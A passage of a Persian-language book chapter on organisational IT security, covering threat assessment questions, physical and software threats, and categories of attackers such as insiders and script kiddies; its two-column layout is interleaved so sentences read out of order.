ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ،ﺍﻣــﺎ ﺩﺍﺷــﺘﻦ
ﺗﺼﻮﻳﺮ ﻛﺎﻣﻠﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻭ ﻗﺎﻟﺐ ﻓﻌﺎﻟﻴﺖ ﺁﻥ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﻳـﻚ ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻱ :ﻣﺮﺯﻫﺎﻱ ﺟﺪﻳﺪ
ﻲ ﺧﻮﺏ ،ﻻﺯﻡ ﺍﺳﺖ .ﻣﺠﻤﻮﻋﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘ ﹺ ﻛﻠﻴﺔ ﺳﺎﺯﻣﺎﻧﻬﺎ -ﭼﻪ ﻛﻮﭼﻚ ﻭ ﭼﻪ ﺑﺰﺭﮒ -ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴـﺖ ﺩﺭ
ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﺷﺮﻛﺘﻲ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺩﻓﻊ ﺿﺎﻳﻌﺎﺕ ﺧﻄﺮﻧـﺎﻙ ﻳﻚ ﻣﺤﻴﻂ ﺟﻬﺎﻧﻲ ﻫﺴﺘﻨﺪ .ﭘﻴﺸﺮﻓﺖ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ
ﻳﺎ ﻣﻮﺍﺩ ﺯﻳﺴﺘﻲ ﻓﻌﺎﻝ ﺍﺳﺖ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﻳﻚ ﺣﻤﻞ ﻭ ﻧﻘﻞ ﺩﺭ ﻗـﺮﻥ ﮔﺬﺷـﺘﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺑﺎﺯﺍﺭﻫـﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ
ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻟﻮﺍﺯﻡ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻓﺮﺁﻳﻨـﺪ ﻧﺰﺩﻳﻜﺘﺮ ﻛﺮﺩﻩ ،ﻫﺰﻳﻨﻪﻫﺎ ﺭﺍ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻩ ﻭ ﺑﺎﻋـﺚ ﺷـﺪﻩ
ﻲ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﺓ ﺍﻣﻨﻴﺘﻲ ﺗﻮﺳﻂ ﻣﺪﻳﺮﻳﺖ ،ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺷﻨﺎﺳﺎﻳ ﹺ ﺍﻣﺮﻭﺯ ﺑﺘﻮﺍﻥ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺑﺮﺍﻱ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺑﻪ ﺗﻤﺎﻣﻲ ﻧﻘﺎﻁ ﺩﻧﻴـﺎ
ﭘﻨﺞ ﺳﺌﻮﺍﻝ ﺯﻳﺮ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ: ﺍﺭﺳﺎﻝ ﻛﺮﺩ .ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﻣـﺪﻳﺮﺍﻥ ﺑﺎﻳـﺪ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ
ﺍﺻﻠﻲﺗﺮﻳﻦ ﻣﺤﺼﻮﻝ ﻳﺎ ﺧﺪﻣﺖ ﺳـﺎﺯﻣﺎﻥ ﭼﻴـﺴﺖ؟ ﺍﮔـﺮ .۱ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﺮﺍﻱ ﻣﺆﺳﺴﻪﻫﺎﻳﺸﺎﻥ ﺩﺭﻧﻈـﺮ ﺑﮕﻴﺮﻧـﺪ .ﺍﺯ ﺍﻧﺘﻬـﺎﻱ
ﭼﻨﺪ ﭘﺎﺳﺦ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺳﻌﻲ ﻛﻨﻴﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻭﻟﻮﻳـﺖﺑﻨـﺪﻱ ﺩﻫﺔ ۱۹۹۰ﺑﻪ ﺑﻌﺪ ﺣﻤـﻼﺕ ﺷـﺪﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ
ﻧﻤﺎﻳﻴﺪ. ﺻﻮﺭﺕ ﭘﺬﻳﺮﻓﺖ )ﻧﻈﻴﺮ ﺣﻤﻠﻪ ﺑﻪ ﻣﺮﻛﺰ ﺗﺠﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺩﺭ ﺳـﺎﻝ .(۲۰۰۱
ﻼ
ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﭼﻨﻴﻦ ﺭﺧﺪﺍﺩﻫﺎﻳﻲ ،ﻧﻴﺎﺯ ﺑﻪ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻛـﺎﻣ ﹰ
ﻣﻨﺎﺑﻊ ﺍﺻﻠﻲ ﺩﺭﺁﻣﺪ ﻭ ﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﻛﺪﺍﻣﻨﺪ؟ .۲
ﺭﻭﺷﻦ ﺷﺪ :ﺿﺮﻭﺭﺕ ﺣﻀﻮﺭ ﭘﻠﻴﺲ ﺩﺭ ﺍﻃﺮﺍﻑ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ،ﻛﻨﺘﺮﻝ
ﺳﺎﺧﺘﺎﺭ ﺳـﺎﺯﻣﺎﻥ ﭼﮕﻮﻧـﻪ ﺍﺳـﺖ؟ ﺑﺨـﺸﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﻭ .۳ ﻭﺭﻭﺩ ﺑﻪ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ،ﻃﺮﺍﺣﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺻـﺤﻴﺢ ﺑـﺮﺍﻱ ﺗﺨﻠﻴـﺔ
ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﺻﻠﻲ ﻫﺮﻳﻚ ﻛﺪﺍﻣﻨﺪ؟ ﺍﻳﻦ ﺑﺨﺸﻬﺎ ﭼﮕﻮﻧﻪ ﻣﺤﻴﻂ ﺩﺭﺻﻮﺭﺕ ﻭﻗـﻮﻉ ﺣﺎﺩﺛـﻪ ،ﻭ ﺗﻮﺳـﻌﻪ ﺩﺍﺩﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ
ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨـﺪ؛ ﭼﮕﻮﻧـﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻣﻄﻤﺌﻦﺗﺮ ﺑﺎ ﻣﻘﺎﻣﺎﺕ ﻣﺤﻠﻲ ﻭ ﻛﺸﻮﺭﻱ.
ﻣﻲﻧﻤﺎﻳﻨﺪ؛ ﻭ ﭼﮕﻮﻧﻪ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣﺠﻤﻮﻋـﺔ ﻭﺍﺣـﺪ ﺑـﻪ
ﺩﺭ ﻗﺴﻤﺖ ﻓﻨﻲ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻇﺮ ﺑﺮﺭﺳﻲ ﺗﻬﺪﻳـﺪﻫﺎﻳﻲ ﻛـﻪ ﺍﺯ
ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ؟
ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﻣﺘﻮﺟﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻛﺎﺭﺑﺮﺩﻱ ،ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ،ﻭ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﮔﺮﻭﻫﻬﺎ ﺭﺍ ﺑﻪ ﻫﻢ
ﺗﻬﺪﻳﺪﺍﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﺪﺍﻡ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻫﺮ ﺑﺨﺶ ﺣﺴﺎﺳﺘﺮ ﺍﺳﺖ ﻭ ﺍﺯ ﭼـﻪ .۴
ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻭ ﺗﻮﺯﻳﻊ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺧﺎﺭﺝ
ﻧﻔﻮﺫ ﺑﻪ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛ •
ﻭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؟
ﺑﺮﺍﻓﺰﺍﺭﻫﺎ )ﻭﻳﺮﻭﺳﻬﺎ ،ﺗﺮﺍﻭﺍﻫﺎ ،ﻛﺮﻣﻬﺎ(؛ •
ﺍﻧﺘﺸﺎﺭ ﻏﻴﺮﻣﺠﺎﺯ ﻳﺎ ﺗﺨﺮﻳﺐ ﺩﺍﺩﻩﻫﺎ؛ ﻭ • ﻣﺸﺘﺮﻳﺎﻥ ،ﺷـﺮﻛﺎ ﻭ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺳـﺎﺯﻣﺎﻥ ﭼـﻪ ﻛـﺴﺎﻧﻲ .۵
ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺑﻮﺳﻴﻠﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ . • ﻫﺴﺘﻨﺪ ﻭ ﻧﺤﻮﺓ ﺗﻌﺎﻣﻞ ﺁﻧﻬﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻥ ﭼﮕﻮﻧﻪ ﺍﺳﺖ؟
ﺍﺯ ﻣﻮﺿﻊ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻧﺴﺎﻧﻲ ،ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﻋﻮﺍﻣﻞ ﺧﺮﺍﺑﻜﺎﺭ ﺩﺍﺧﻠـﻲ ﺍﻃﻼﻋﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺮﺍﻱ ﭘﺎﺳـﺦ ﺩﺍﺩﻥ ﺑـﻪ ﺍﻳـﻦ ﺳـﺆﺍﻻﺕ ﺭﺍ
ﻭ ﺧﺎﺭﺟﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺍﺧﻠﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﮔﻔﺘﮕﻮ ﺑﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ )ﺑﺨﺼﻮﺹ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﻓﻨـﺎﻭﺭﻱ
ﻣﻲﺗﻮﺍﻧﺪ ﻧﺎﺷﻲ ﺍﺯ ﺧﻄﺎﻱ ﺍﻧﺴﺎﻧﻲ ﺑﺎﺷﺪ :ﻳﻚ ﺳﻬﻞﺍﻧﮕﺎﺭﻱ ﺳﺎﺩﻩ، ﺍﻃﻼﻋﺎﺕ( ،ﻣﺪﻳﺮﺍﻥ ﻭ ﻫﻴﺄﺕ ﻣﺪﻳﺮﻩ ﺷﺮﻛﺖ ﺑﺪﺳﺖ ﺁﻭﺭﺩ .ﺍﺭﺯﻳـﺎﺑﻲ
ﺑﻲﺗﻮﺟﻬﻲ ،ﻳﺎ ﻋﺪﻡ ﺁﻣﻮﺯﺵ ﻛﺎﻓﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ .ﺩﺭ ﺣﻮﺯﻩﻫﺎﻱ ﺩﻳﮕﺮ ﻧﻈﺮﺍﺕ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻣﻮﺭﺩ ﻣﺴﺎﺋﻞ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ
ﺑﺨــﺼﻮﺹ ﺟﺎﺳﻮﺳــﻲ ﺳــﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ،ﻣــﻲﺗــﻮﺍﻥ ﺍﺯ ﻣﻬﻨﺪﺳــﻲ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻛﺸﻒ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳـﺪ ﺷـﻮﺩ .ﺩﺳـﺖ ﺁﺧـﺮ
ﺍﺟﺘﻤﺎﻋﻲ ٥٦ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﺴﻬﻴﻼﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﺍﻳﻨﻜﻪ ﺗﻴﻤﻲ ﻛﻪ ﺑﻪ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﭘـﺮﺩﺍﺯﺩ ﺑﺎﻳـﺪ ﺑـﺎ
ﻣﺤﺮﻣﺎﻧﺔ ﺍﻓﺮﺍﺩ ﺁﮔﺎﻩ ﺩﺍﺧﻞ ﺷﺮﻛﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ .ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺩﺑﻴﺎﺕ ﮔﺰﺍﺭﺷﺎﺕ ﺭﺳﺎﻧﻪﻫﺎ ﺩﺭ ﻣﻮﺭﺩ ﺷﺮﻛﺖ ﺁﺷﻨﺎ ﺑﺎﺷـﺪ .ﻧﻈـﺮﺍﺕ
ﻣﻨﺎﺳﺐ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺑﺨـﺶ ﺍﻣﻨﻴـﺖ ﻭ ﺑـﺎ ﻫﻤﻜـﺎﺭﻱ ﻋﻤﻮﻣﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣـﺆﺛﺮ ﺑﺎﺷـﺪ؛ ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﺷـﺮﻛﺖ ﺩﺭ
ﺑﺨﺶ ﭘﺮﺳﻨﻠﻲ ﺍﻳﺠﺎﺩ ﺷﻮﻧﺪ ﺗﺎ ﺑﻪ ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ. ﺻﻨﻌﺘﻲ ﺑﺤﺚﺍﻧﮕﻴﺰ ﻳﺎ ﺩﺭ ﺟﺎﻳﮕﺎﻫﻲ ﺣﺴﺎﺱ ﻓﻌﺎﻟﻴﺖ ﻛﻨـﺪ ،ﻭ ﻳـﺎ
ﺑﺨﺸﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﺮﺳﻨﻠﻲ ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺭﻭﺍﻟﻬـﺎﻱ ﮔﺰﺍﺭﺷﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺩﺭ ﻧﺸﺮﻳﺎﺕ ﻇـﺎﻫﺮ ﺷـﺪﻩ
ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺍﺧﺮﺍﺝ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮﭼـﻪ ﺑﺎﺷﺪ.
ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻧﮕﻴﺰﺓ ﺷﻔﺎﻓﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ
ﻳﺎﻓﺖ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﻳﻨﮕﻮﻧﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨـﺮﺏ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺷﻤﻦ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ:
ﻧﻴﺎﺯ ﺑﻪ ﺗﻮﺿﻴﺢ ﻣﻔﺼﻞ ﺩﺍﺭﻧﺪ .ﺩﺳﺘﻪﺑﻨﺪﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ
ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﭼﻨﺪﺍﻥ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﻧﻴـﺴﺖ ،ﻭﻟـﻲ ﺑـﻪ ﻫـﺮ ﺗﺮﺗﻴـﺐ
ﺯﻣﺎﻧﻴﻜــﻪ ﺷــﺮﻛﺖ ﺳــﺎﺧﺘﺎﺭ ﻭ ﻋﻤﻠﻜــﺮﺩ ﺧــﻮﺩ ﺭﺍ ﺍﺭﺯﻳــﺎﺑﻲ ﻛــﺮﺩ،
ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺷﺪﺕ ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻣﺘﻨﺎﻇﺮﹰﺍ ﺁﺳﻴﺐ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ
ﻣﻮﻗﻌﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺷﺮﺣﻲ ﺍﺯ ﻧﻘـﺎﻁ ﺑـﺎﻟﻘﻮﺓ ﻗـﻮﺕ ﻭ
ﻫﺮ ﺗﻬﺪﻳﺪ ﺑﺼﻮﺭﺕ ﻛﻠﻲ ﺑﺤﺚ ﻛﺮﺩ.
ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﺁﻥ ﺑﺪﺳـﺖ ﻣـﻲﺁﻳـﺪ .ﺩﺭ ﺍﺑﺘـﺪﺍ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺭﻭﻱ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ) ٥٧ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﺎﺑﺴﺘﺎﻧﻲ ،(٥٨ﻛﺎﺭﻣﻨﺪﺍﻥ ﻳﻚ ﺗﻬﺪﻳــﺪﺍﺕ ﻛﻠــﻲ ﻣﺘﻤﺮﻛــﺰ ﺷــﻮﻳﻢ .ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ
ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﺷـﻨﺎﻳﻲ ﺩﺍﺭﻧـﺪ .ﺍﻳـﻦ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪﻧﺪ ،ﺍﺭﺯﻳﺎﺑﻲ ﺳﻄﺢ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺩﺭ
ﻻ ﻗـﺼﺪ ﺗﺨﺮﻳـﺐ ﺩﺍﺩﻩﻫـﺎ ﻭ ﺩﺍﺭﺍﺋﻴﻬـﺎﻱ ﺷـﺮﻛﺖ ﺭﺍ ﺍﻓﺮﺍﺩ ﻣﻌﻤـﻮ ﹰ ﻓﻌﺎﻟﻴـﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺧﻮﺍﻫﺪ
ﻧﺪﺍﺭﻧﺪ ،ﺍﻣﺎ ﺍﺯ ﺭﻭﻱ ﻛﻨﺠﻜﺎﻭﻱ ﺳﻌﻲ ﻣﻲﻛﻨﻨـﺪ ﺑـﻪ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﺑﻮﺩ.
ﻣﺠﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺴﺘﻨﺪ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﻨﺪ .ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ
ﺗﻬﺪﻳﺪﺍﺕ ﻛﻠﻲ ﻫﺮ ﺷﺮﻛﺖ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺳﻤﻲ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﻼ ﺑﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫ ﺁﺷﻨﺎ ﻧﺒﺎﺷﻨﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳـﺖ ﺷﺎﻳﺪ ﻛﺎﻣ ﹰ
ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺎﻋﺚ ﺗﺨﺮﻳﺐ ﺳﻴﺴﺘﻤﻬﺎ ﺷﻮﻧﺪ .ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺍﮔـﺮ ﺗﻬﺪﻳﺪﺍﺕ ﻓﻴﺰﻳﻜﻲ
ﺍﺑﺰﺍﺭﻫﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ downloadﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ
ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ )ﺁﺗﺶﺳﻮﺯﻱ ،ﺯﻟﺰﻟﻪ ،ﻃﻮﻓﺎﻧﻬﺎﻱ ﺷﺪﻳﺪ ﻭ ﺳﻴﻞ(؛ •
ﺩﺭﺏ ﻣﺨﻔــﻲ ٥٩ﻳــﺎ ﺗــﺮﺍﻭﺍ ٦٠ﺑﺎﺷــﻨﺪ ﻛــﻪ ﻣــﻮﺭﺩ ﺍﺳــﺘﻔﺎﺩﻩ ﺩﻳﮕــﺮ
ﺩﺯﺩﻱ؛ •
ﻣﻬﺎﺟﻤﻴﻦ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ .ﻟﺬﺍ ﻧﻔﻮﺫ ﺗﻔﻨﻨـﻲ ﻳـﻚ ﺗﻬﺪﻳـﺪ ﺑـﺰﺭﮒ
ﺗﺨﺮﻳﺐ؛ •
ﺗﺪﺍﺧﻠﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛ •
ﺗﺨﺮﻳﺐ ﺷﺒﻜﻪ؛ ﻭ •
56 Social Engineering
ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ. •
57 Casual Hackers
58 Summertime Hackers
59 Backdoor
60 Trojan
١٣٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺍﺭﺩ .ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﻪ ﻋﻠﺖ ﺳﻄﺢ ﺩﺳﺘﺮﺳﻲﺷﺎﻥ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ، ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ ﻭ ﻣﻬﻤﺘﺮﻳﻦ ﺩﻟﻴﻞ ﻣﻤﻨﻮﻉ ﺑﻮﺩﻥ ﺁﻥ ﻧﻴﺰ ﻫﻤﻴﻦ
ﺍﺯ ﻟﺤﺎﻅ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﻧﮕﺮﺍﻧﻲ ﺟﺪﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ. ﺍﺳﺖ.
ﺩﺭ ﺩﺳﺘﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ ،ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﺑﻪ ﻋﻠﺖ ﺧـﺴﺘﮕﻲ ﻻ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺟـﻮﺍﻧﺘﺮ )ﺩﺭ ﺳـﻦ
""Script Kiddieﻫـﺎ ﻣﻌﻤـﻮ ﹰ
ﺍﺯ ﻛﺎﺭ ﻳﺎ ﺟﺬﺍﺑﻴﺘﻬﺎﻱ ﺭﻗﺎﺑﺖ ﻓﻨﻲ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻧﻔـﻮﺫ ﻣـﻲﻛﻨﻨـﺪ. ﺩﺑﻴﺮﺳﺘﺎﻥ ﻳﺎ ﭘﻴﺶﺩﺍﻧﺸﮕﺎﻫﻲ( ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧـﻮﺏ
ﮔﺮﻭﻫﻲ ﺩﻳﮕﺮ ﺑﺪﻧﺒﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺗﺮﻓﻴـﻊ ﻭ ﺩﺳـﺘﻤﺰﺩ ﻭ ﺍﻭﻗﺎﺕ ﺑﻴﻜﺎﺭﻱ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﭼﻨﺪﺍﻥ ﺧﺒﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺑـﺮﺍﻱ
ﻫﻤﻜﺎﺭﺍﻥ ﻳﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻫـﺴﺘﻨﺪ .ﺑﻌـﻀﻲ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ ﺍﻧﺠﺎﻡ ﻧﻔﻮﺫ ﺍﺯ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ
ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﺗﻼﻓﻲ ﺟﻮﻳﺎﻧﻪ ﻋﻠﻴﻪ ﺳﺎﺯﻣﺎﻥ ﺑـﻪ ﺍﻳـﻦ ﻣﻲﻛﻨﻨﺪ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺮﺍﺩ ﺍﻳﻦ ﺩﺳﺘﻪ ﻣﺎﻧﻨﺪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ )ﻛﻪ
ﻋﻤﻞ ﺩﺳﺖ ﺑﺰﻧﻨﺪ؛ ﻳﺎ ﺑﺎﻋﺚ ﺗﻬﺪﻳـﺪﺍﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪﺍﻱ ﺷـﻮﻧﺪ ﻛـﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤـﻴﻦ ﻣﻄﻠـﺐ ﺑﺮﺭﺳـﻲ ﺷـﺪﻩ( ،ﺑـﺮ ﺭﻭﻱ ﺗﺨﺮﻳـﺐ ﻣﺘﻤﺮﻛـﺰ
